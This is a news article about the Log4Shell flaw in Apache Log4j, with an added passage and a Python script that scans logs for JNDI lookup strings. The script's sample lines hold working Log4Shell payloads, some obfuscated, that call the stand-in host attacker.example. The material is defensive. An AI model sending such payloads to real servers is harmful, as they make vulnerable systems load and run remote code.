Log4shell software flaw threatens millions of servers as hackers scramble to exploit it

A critical vulnerability in a widely used software tool, one first exploited in the online game Minecraft, is quickly emerging as a major threat to organizations around the world.

“The internet is on fire right now,” said Adam Meyers, senior vice president of intelligence at cybersecurity firm Crowdstrike.

“People are jostling to patch [it] and all kinds of people are jostling to exploit it,” he said.

He said on Friday morning US time that in the 12 hours since the bug was revealed it had been “fully weaponized,” meaning criminals had developed and distributed tools to exploit it.

The flaw may be the worst IT vulnerability discovered in years.

It was discovered in an open source logging tool, Apache Log4j, that is ubiquitous in cloud servers and in enterprise software used in industry and government.

Unless it is fixed, it gives criminals, spies and even programming novices easy access to internal networks, where they can loot valuable data, implant malware, erase crucial information and much more.

“I would be hard pressed to think of a company that is completely risk free,” said Joe Sullivan, chief security officer of Cloudflare, whose online infrastructure protects websites from malicious actors.

The logging tool is installed on millions of servers, and experts said the fallout would not be known for several days.

Amit Yoran, CEO of cybersecurity firm Tenable, called it “the biggest and most critical vulnerability of the past decade” – and perhaps the biggest in modern computing history.

No password required

The vulnerability, dubbed Log4Shell, was given the maximum severity rating of 10 out of 10 by the Apache Software Foundation, which oversees development of the tool.

Anyone with a working exploit can gain full access to an unpatched computer that is running the software.

Experts have said that the extreme ease with which the vulnerability allows an attacker to access a web server – without a password – is what makes it so dangerous.

[Image: Lydia Winters stands on stage with signs showing Microsoft's Minecraft game at the Xbox E3 2015 briefing. Caption: Experts say Minecraft users have already exploited the flaw to attack other users by pasting a short message into a chat box. (AP: Damian Dovarganes, file photo)]

The New Zealand Computer Emergency Response Team was among the first to report that the vulnerability was being “actively exploited in the wild,” just hours after it was publicly disclosed on Thursday and a patch was released.

The vulnerability, located in the open source Apache Log4j library that is used by websites and other web services, was reported to the foundation on November 24 by Chinese tech giant Alibaba, the foundation said.

It took two weeks to develop and release a fix.

But fixing systems around the world could be a complicated task.

While most organizations and cloud providers like Amazon should be able to update their web servers with ease, the same Apache software is also often bundled with third-party programs, which often can only be updated by their owners.

Mr Yoran, from Tenable, said organizations need to assume they have been compromised and act quickly.

The first obvious signs that the vulnerability was being exploited were in Minecraft, a popular online game from Microsoft.

Mr Meyers and security expert Marcus Hutchins said Minecraft users are already using it to run programs on other users’ computers by pasting a short message into a chat box.
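The article does not say what that “short message” contains. It is the well-documented Log4Shell mechanism (CVE-2021-44228): a logged string of the form `${jndi:ldap://host/path}` makes vulnerable Log4j versions fetch and run attacker-supplied code, which is also why no password is needed; the attacker only has to get text into something the server logs, whether a chat line, a username or an HTTP header. The Python scanner below is an added example, not code from the article, from Microsoft or from the Apache project. It shows how a defender can triage existing logs for such lookups, including the lightly obfuscated variants attackers use to evade naive string matching. The sample log lines, the player names and the host `attacker.example` are constructed for this example.

```python
import re

# Constructed sample log lines (not real data): a game server that logs chat
# messages verbatim, as the article describes. Player names and the host
# "attacker.example" are made up for this example.
SAMPLE_LINES = [
    "[12:01:03] [Server thread/INFO]: <steve> hello everyone",
    "[12:01:09] [Server thread/INFO]: <mallory> ${jndi:ldap://attacker.example/a}",
    "[12:01:15] [Server thread/INFO]: <mallory> ${${lower:j}ndi:${lower:l}dap://attacker.example/b}",
    "[12:01:20] [Server thread/INFO]: <mallory> ${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}",
    "[12:01:31] [Server thread/INFO]: <alex> my house costs ${price} emeralds",
]

# Two Log4j lookup forms attackers use to hide the word "jndi" from naive
# matching: ${lower:X} / ${upper:X} case-fold X, and ${name:-X} yields the
# default X when the lookup "name" is empty or undefined. Both regexes match
# only innermost lookups (no nested "$" or braces), so repeated substitution
# peels the obfuscation from the inside out.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# After normalisation, a JNDI lookup with any remotely resolvable scheme.
# Log4j lower-cases the lookup prefix, so match case-insensitively.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE
)


def normalize(text: str) -> str:
    """Resolve innermost obfuscation lookups repeatedly until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def scan(lines):
    """Return (line_number, scheme, normalized_line) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        match = _JNDI.search(normalized)
        if match:
            hits.append((number, match.group(1).lower(), normalized))
    return hits


if __name__ == "__main__":
    for number, scheme, normalized in scan(SAMPLE_LINES):
        print(f"line {number}: jndi lookup via {scheme}: {normalized}")
```

Run over the constructed lines, the scanner flags lines 2, 3 and 4 and leaves the harmless `${price}` on line 5 alone. Treat a hit as evidence that someone tried, not that they succeeded, and remember the limits: the normaliser only undoes the two obfuscation forms it knows, and attackers kept inventing others, so pattern matching is a triage aid for incident response, not a defence. The actual fix is the one the article describes, updating the vulnerable Log4j library everywhere it is bundled.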

Microsoft said it has released a software update for Minecraft users.

Researchers reported finding evidence that the vulnerability could be exploited on servers managed by companies such as Apple, Amazon, Twitter, and Cloudflare.

Cloudflare’s Mr Sullivan said there was no indication that his company’s servers had been compromised.

Apple, Amazon and Twitter did not immediately respond to requests for comment.
